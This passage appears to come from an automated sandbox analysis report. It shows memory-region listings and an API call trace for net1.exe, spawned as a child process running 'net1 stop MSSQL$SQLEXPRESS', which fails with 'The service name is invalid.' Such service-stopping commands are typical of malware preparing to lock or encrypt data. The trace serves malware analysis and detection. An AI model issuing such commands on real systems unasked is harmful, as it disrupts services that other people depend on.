"c:\\windows\\syswow64\\ntdll.dll") Region: id = 6252 start_va = 0x7ee60000 end_va = 0x7ee82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee60000" filename = "" Region: id = 6253 start_va = 0x7ee88000 end_va = 0x7ee88fff entry_point = 0x0 region_type = private name = "private_0x000000007ee88000" filename = "" Region: id = 6254 start_va = 0x7ee8b000 end_va = 0x7ee8dfff entry_point = 0x0 region_type = private name = "private_0x000000007ee8b000" filename = "" Region: id = 6255 start_va = 0x7ee8e000 end_va = 0x7ee8efff entry_point = 0x0 region_type = private name = "private_0x000000007ee8e000" filename = "" Region: id = 6256 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6257 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6258 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6259 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6260 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6261 start_va = 0x4e60000 end_va = 0x4e6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 6262 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6263 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6264 start_va = 0x4fe0000 end_va = 0x50dffff entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 6265 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 398 os_tid = 0xe4c Thread: id = 399 os_tid = 0xe48 Process: id = "105" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x256ab000" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "104" os_parent_pid = "0xd0c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6266 start_va = 0x700000 end_va = 0x71ffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 6267 start_va = 0x720000 end_va = 0x721fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 6268 start_va = 0x730000 end_va = 0x743fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 6269 start_va = 0x750000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 6270 start_va = 0x790000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 6271 start_va = 0x810000 end_va = 0x813fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 6272 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 6273 start_va = 0x830000 end_va = 0x831fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 6274 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 6275 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 6276 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6277 start_va = 0x7e870000 end_va = 0x7e892fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e870000" filename = "" Region: id = 6278 start_va = 0x7e895000 end_va = 0x7e895fff entry_point = 0x0 region_type = private name = "private_0x000000007e895000" filename = "" Region: id = 6279 start_va = 0x7e89a000 end_va = 0x7e89cfff entry_point = 0x0 region_type = private name = "private_0x000000007e89a000" filename = "" Region: id = 6280 start_va = 0x7e89d000 end_va = 0x7e89dfff entry_point = 0x0 region_type = private name = "private_0x000000007e89d000" filename = "" Region: id = 6281 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6282 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6283 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6284 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6285 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6286 start_va = 0xa20000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 6287 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6288 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6289 start_va = 0x840000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 6290 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6291 start_va = 0x700000 end_va = 0x70ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 6292 start_va = 0x710000 end_va = 0x713fff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 6293 start_va = 0x940000 end_va = 0x9fdfff entry_point = 0x940000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6294 start_va = 0xa30000 end_va = 0xa6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 6295 start_va = 0xa70000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 6296 start_va = 0xb80000 end_va = 0xb8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 6297 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 6298 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 6299 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 6300 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 6301 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6302 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6303 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6304 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6305 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6306 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6307 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6308 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6309 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6310 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6311 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6312 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6313 start_va = 0x7e770000 end_va = 0x7e86ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e770000" filename = "" Region: id = 6314 start_va = 0x7e897000 end_va = 0x7e899fff entry_point = 0x0 region_type = private name = "private_0x000000007e897000" filename = "" Region: id = 6315 start_va = 0x720000 end_va = 0x723fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 6316 start_va = 0xa00000 end_va = 0xa02fff entry_point = 0xa00000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 6317 start_va = 0xaf0000 end_va = 0xb21fff entry_point = 0xaf0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 400 os_tid = 0xe44 [0128.303] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0128.303] __set_app_type (_Type=0x1) [0128.303] __p__fmode () returned 0x77ac4d6c [0128.303] __p__commode () returned 0x77ac5b1c [0128.303] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0128.303] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0128.303] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0128.303] GetConsoleOutputCP () returned 0x1b5 [0128.304] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0128.304] SetThreadUILanguage (LangId=0x0) returned 0x409 [0128.306] sprintf_s (in: _DstBuf=0x80fb1c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0128.306] setlocale (category=0, locale=".437") returned="English_United States.437" [0128.308] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0128.308] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0128.308] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS" [0128.308] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x80f8c4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0128.308] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x80f8b8 | out: Buffer=0x80f8b8*=0x8480a8) returned 0x0 [0128.308] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x80f8bc | out: Buffer=0x80f8bc*=0x847fe8) returned 0x0 [0128.308] __iob_func () returned 0x77ac1208 [0128.308] _fileno (_File=0x77ac1208) returned 0 [0128.308] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0128.308] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0128.308] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0128.308] _wcsicmp (_String1="config", _String2="stop") returned -16 [0128.308] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0128.308] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0128.308] _wcsicmp (_String1="file", _String2="stop") returned -13 [0128.308] _wcsicmp (_String1="files", _String2="stop") returned -13 [0128.308] _wcsicmp (_String1="group", _String2="stop") returned -12 [0128.308] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0128.308] _wcsicmp (_String1="help", _String2="stop") returned -11 [0128.308] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0128.308] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0128.308] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0128.308] _wcsicmp (_String1="session", _String2="stop") returned -15 [0128.308] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0128.308] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0128.308] _wcsicmp (_String1="share", _String2="stop") returned -12 [0128.308] _wcsicmp (_String1="start", _String2="stop") returned -14 [0128.308] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0128.308] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0128.308] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0128.308] _wcsicmp (_String1="accounts", _String2="MSSQL$SQLEXPRESS") returned -12 [0128.308] _wcsicmp (_String1="computer", _String2="MSSQL$SQLEXPRESS") returned -10 [0128.308] _wcsicmp (_String1="config", _String2="MSSQL$SQLEXPRESS") returned -10 [0128.308] _wcsicmp (_String1="continue", _String2="MSSQL$SQLEXPRESS") returned -10 [0128.308] _wcsicmp (_String1="cont", _String2="MSSQL$SQLEXPRESS") returned -10 [0128.308] _wcsicmp (_String1="file", _String2="MSSQL$SQLEXPRESS") returned -7 [0128.308] _wcsicmp (_String1="files", _String2="MSSQL$SQLEXPRESS") returned -7 [0128.308] _wcsicmp (_String1="group", _String2="MSSQL$SQLEXPRESS") returned -6 [0128.308] _wcsicmp (_String1="groups", _String2="MSSQL$SQLEXPRESS") returned -6 [0128.308] _wcsicmp (_String1="help", _String2="MSSQL$SQLEXPRESS") returned -5 [0128.308] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SQLEXPRESS") returned -5 [0128.308] _wcsicmp (_String1="localgroup", _String2="MSSQL$SQLEXPRESS") returned -1 [0128.308] _wcsicmp (_String1="pause", _String2="MSSQL$SQLEXPRESS") returned 3 [0128.308] _wcsicmp (_String1="session", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="sessions", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="sess", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="share", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="start", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="stats", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.308] _wcsicmp (_String1="statistics", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.309] _wcsicmp (_String1="stop", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.309] _wcsicmp (_String1="time", _String2="MSSQL$SQLEXPRESS") returned 7 [0128.309] _wcsicmp (_String1="user", _String2="MSSQL$SQLEXPRESS") returned 8 [0128.309] _wcsicmp (_String1="users", _String2="MSSQL$SQLEXPRESS") returned 8 [0128.309] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0128.309] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0128.309] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.309] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.309] _wcsicmp (_String1="netpopup", _String2="MSSQL$SQLEXPRESS") returned 1 [0128.309] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.309] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.309] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.309] _wcsicmp (_String1=0x1081ffc, _String2="MSSQL$SQLEXPRESS") returned 10 [0128.309] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0128.309] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0128.309] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0128.309] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0128.309] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0128.309] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.309] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.309] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.309] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0128.309] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0128.309] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0128.309] _wcsupr (in: _String="MSSQL$SQLEXPRESS" | out: _String="MSSQL$SQLEXPRESS") returned="MSSQL$SQLEXPRESS" [0128.309] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x843440 [0128.311] GetServiceKeyNameW (in: hSCManager=0x843440, lpDisplayName="MSSQL$SQLEXPRESS", lpServiceName=0x10a8cb0, lpcchBuffer=0x80f834 | out: lpServiceName="", lpcchBuffer=0x80f834) returned 0 [0128.311] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0128.311] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0128.311] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.311] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.311] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.311] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.311] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0128.311] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0128.311] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0128.311] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0128.311] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0128.311] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0128.311] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0128.311] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.311] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.311] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0128.312] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0128.312] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0128.312] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="WORKSTATION") returned -10 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="LanmanWorkstation") returned 1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="SERVER") returned -6 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="LanmanServer") returned 1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="BROWSER") returned 11 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="BROWSER") returned 11 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="MESSENGER") returned 14 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="MESSENGER") returned 14 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETRUN") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETRUN") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="SPOOLER") returned -6 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="SPOOLER") returned -6 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="ALERTER") returned 12 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="ALERTER") returned 12 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETLOGON") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETLOGON") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETPOPUP") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="NETPOPUP") returned -1 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="SQLSERVER") returned -6 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="SQLSERVER") returned -6 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="REPLICATOR") returned -5 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="REPLICATOR") returned -5 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="REMOTEBOOT") returned -5 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="REMOTEBOOT") returned -5 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="TIMESOURCE") returned -7 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="TIMESOURCE") returned -7 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="AFP") returned 12 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="AFP") returned 12 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="UPS") returned -8 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="UPS") returned -8 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="XACTSRV") returned -11 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="XACTSRV") returned -11 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="TCPIP") returned -7 [0128.312] _wcsicmp (_String1="MSSQL$SQLEXPRESS", _String2="TCPIP") returned -7 [0128.312] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x846c90 [0128.312] OpenServiceW (hSCManager=0x846c90, lpServiceName="MSSQL$SQLEXPRESS", dwDesiredAccess=0x84) returned 0x0 [0128.313] GetLastError () returned 0x424 [0128.313] CloseServiceHandle (hSCObject=0x846c90) returned 1 [0128.313] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0128.313] LoadLibraryW (lpLibFileName="NETMSG") returned 0xa00000 [0128.313] FormatMessageW (in: dwFlags=0x2a00, lpSource=0xa00000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0128.314] GetFileType (hFile=0x40) returned 0x2 [0128.314] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x80f6d0 | out: lpMode=0x80f6d0) returned 1 [0128.315] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x80f6dc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x80f6dc*=0x1e) returned 1 [0128.315] GetFileType (hFile=0x40) returned 0x2 [0128.315] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x80f6d0 | out: lpMode=0x80f6d0) returned 1 [0128.315] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x80f6dc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x80f6dc*=0x2) returned 1 [0128.315] _ultow (in: _Dest=0x889, _Radix=8451824 | out: _Dest=0x889) returned="2185" [0128.315] FormatMessageW (in: dwFlags=0x2800, lpSource=0xa00000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0128.315] GetFileType (hFile=0x40) returned 0x2 [0128.315] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x80f6c0 | out: lpMode=0x80f6c0) returned 1 [0128.316] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x80f6cc, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x80f6cc*=0x34) returned 1 [0128.316] GetFileType (hFile=0x40) returned 0x2 [0128.316] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x80f6c0 | out: lpMode=0x80f6c0) returned 1 [0128.316] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x80f6cc, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x80f6cc*=0x2) returned 1 [0128.316] NetApiBufferFree (Buffer=0x8480a8) returned 0x0 [0128.316] NetApiBufferFree (Buffer=0x847fe8) returned 0x0 [0128.316] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop 